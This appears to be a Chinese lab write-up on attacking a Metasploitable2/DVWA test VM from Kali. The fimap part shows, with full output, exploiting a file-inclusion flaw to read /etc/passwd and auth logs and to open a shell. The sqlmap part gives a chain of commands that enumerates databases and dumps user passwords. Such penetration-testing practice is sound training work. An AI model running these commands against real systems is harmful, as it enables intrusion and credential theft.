metasploitable实践

时间:2022-09-15 10:48:59

使用Fimap和metasploitable2文件包含漏洞测试

fimap

首先查看msf已经存在的漏洞:

metasploitable实践

metasploitable实践

metasploitable实践

root@kali:~# fimap -u 'http://192.168.136.130/lfi.php?page=index.php' --force-run

fimap v.1.00_svn (My life for Aiur)

:: Automatic LFI/RFI scanner and exploiter

:: by Iman Karim (fimap.dev@gmail.com)

SingleScan is testing URL: 'http://192.168.136.130/lfi.php?page=index.php'

[05:57:09] [OUT] Inspecting URL 'http://192.168.136.130/lfi.php?page=index.php'...

[05:57:09] [INFO] Fiddling around with URL...

[05:57:09] [OUT] [PHP] Possible file inclusion found! -> 'http://192.168.136.130/lfi.php?page=IzIjx0Ao' with Parameter 'page'.

[05:57:09] [OUT] [PHP] Identifying Vulnerability 'http://192.168.136.130/lfi.php?page=index.php' with Parameter 'page'...

[05:57:09] [INFO] Scriptpath received: '/var/www'

[05:57:09] [INFO] Operating System is 'Unix-Like'.

[05:57:09] [INFO] Testing file '/etc/passwd'...

[05:57:09] [INFO] Testing file '/proc/self/environ'...

[05:57:09] [INFO] Testing file 'php://input'...

[05:57:09] [INFO] Testing file '/var/log/apache2/access.log'...

[05:57:09] [INFO] Testing file '/var/log/apache/access.log'...

[05:57:09] [INFO] Testing file '/var/log/httpd/access.log'...

[05:57:09] [INFO] Testing file '/var/log/apache2/access_log'...

[05:57:09] [INFO] Testing file '/var/log/apache/access_log'...

[05:57:09] [INFO] Testing file '/var/log/httpd/access_log'...

[05:57:09] [INFO] Testing file '/apache/logs/access.log'...

[05:57:09] [INFO] Testing file '/apache/logs/access_log'...

[05:57:09] [INFO] Testing file '/apache2/logs/access.log'...

[05:57:09] [INFO] Testing file '/apache2/logs/access_log'...

[05:57:09] [INFO] Testing file '/etc/httpd/logs/access_log'...

[05:57:10] [INFO] Testing file '/etc/httpd/logs/access.log'...

[05:57:10] [INFO] Testing file '/var/httpd/logs/access_log'...

[05:57:10] [INFO] Testing file '/var/httpd/logs/access.log'...

[05:57:10] [INFO] Testing file '/var/www/logs/access_log'...

[05:57:10] [INFO] Testing file '/var/www/logs/access.log'...

[05:57:10] [INFO] Testing file '/usr/local/apache/logs/access_log'...

[05:57:10] [INFO] Testing file '/usr/local/apache/logs/access.log'...

[05:57:10] [INFO] Testing file '/usr/local/apache2/logs/access_log'...

[05:57:10] [INFO] Testing file '/usr/local/apache2/logs/access.log'...

[05:57:10] [INFO] Testing file '/var/log/access_log'...

[05:57:10] [INFO] Testing file '/var/log/access.log'...

[05:57:10] [INFO] Testing file '/logs/access.log'...

[05:57:10] [INFO] Testing file '/logs/access_log'...

[05:57:10] [INFO] Testing file '/opt/lampp/logs/access_log'...

[05:57:10] [INFO] Testing file '/opt/lampp/logs/access.log'...

[05:57:10] [INFO] Testing file '/opt/xampp/logs/access.log'...

[05:57:10] [INFO] Testing file '/opt/xampp/logs/access_log'...

[05:57:10] [INFO] Testing file '/var/log/auth.log'...

[05:57:10] [INFO] Testing file '/var/log/secure'...

[05:57:10] [INFO] Testing file 'http://www.tha-imax.de/fimap_testfiles/test'...

##################################################################

#[1] Possible PHP-File Inclusion                                 #

##################################################################

#::REQUEST                                                       #

#  [URL]        http://192.168.136.130/lfi.php?page=index.php    #

#  [HEAD SENT]                                                   #

#::VULN INFO                                                     #

#  [GET PARAM]  page                                             #

#  [PATH]       /var/www                                         #

#  [OS]         Unix                                             #

#  [TYPE]       Absolute Clean                                   #

#  [TRUNCATION] No Need. It's clean.                             #

#  [READABLE FILES]                                              #

#                   [0] /etc/passwd                              #

#                   [1] /proc/self/environ                       #

#                   [2] /var/log/auth.log                        #

##################################################################

root@kali:~# clear

root@kali:~# fimap -x --force-run

fimap v.1.00_svn (My life for Aiur)

:: Automatic LFI/RFI scanner and exploiter

:: by Iman Karim (fimap.dev@gmail.com)

###########################

#:: List of Domains ::    #

###########################

#[1] 192.168.136.130      #

#[q] Quit                 #

###########################

Choose Domain: 1

#####################################################################################################

#:: FI Bugs on '192.168.136.130' ::                                                                 #

#####################################################################################################

#[1] URL: '/lfi.php?page=index.php' injecting file: '/proc/self/environ' using GET-param: 'page'    #

#[2] URL: '/lfi.php?page=index.php' injecting file: '/var/log/auth.log' using GET-param: 'page'     #

#[q] Quit                                                                                           #

#####################################################################################################

Choose vulnerable script: 1

[06:01:09] [INFO] Testing PHP-code injection thru User-Agent...

[06:01:09] [OUT] PHP Injection works! Testing if execution works...

[06:01:09] [INFO] Testing execution thru 'popen[b64]'...

[06:01:09] [OUT] Execution thru 'popen[b64]' works!

####################################################

#:: Available Attacks - PHP and SHELL access ::    #

####################################################

#[1] Spawn fimap shell                             #

#[2] Spawn pentestmonkey's reverse shell           #

#[3] [Test Plugin] Show some info                  #

#[q] Quit                                          #

####################################################

Choose Attack: 1

Please wait - Setting up shell (one request)...

-------------------------------------------

Welcome to fimap shell!

Better don't start interactive commands! ;)

Also remember that this is not a persistent shell.

Every command opens a new shell and quits it after that!

Enter 'q' to exit the shell.

-------------------------------------------

fishell@www-data:/var/www$>

使用sqlmap和metasploitable2进行SQL注入实验

实验环境是kali的sqlmap和metasploit2.
root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSSID=31e286bfcb5f99785b26e2af656da170;sercurity=low'

metasploitable实践

root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSSID=31e286bfcb5f99785b26e2af656da170;sercurity=low' --current-user

metasploitable实践

root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSSID=31e286bfcb5f99785b26e2af656da170;sercurity=low' --current-db

metasploitable实践

root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSSID=31e286bfcb5f99785b26e2af656da170;sercurity=low' -dbs

metasploitable实践

root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSSID=31e286bfcb5f99785b26e2af656da170;sercurity=low' -users

metasploitable实践

metasploitable实践

root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSSID=31e286bfcb5f99785b26e2af656da170;sercurity=low' --table -D dvwa

metasploitable实践

root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSSID=31e286bfcb5f99785b26e2af656da170;sercurity=low' --column -T users -D dvwa

metasploitable实践

root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSSID=31e286bfcb5f99785b26e2af656da170;sercurity=low' --dump -C user,password -T users -D dvwa

metasploitable实践

相关文章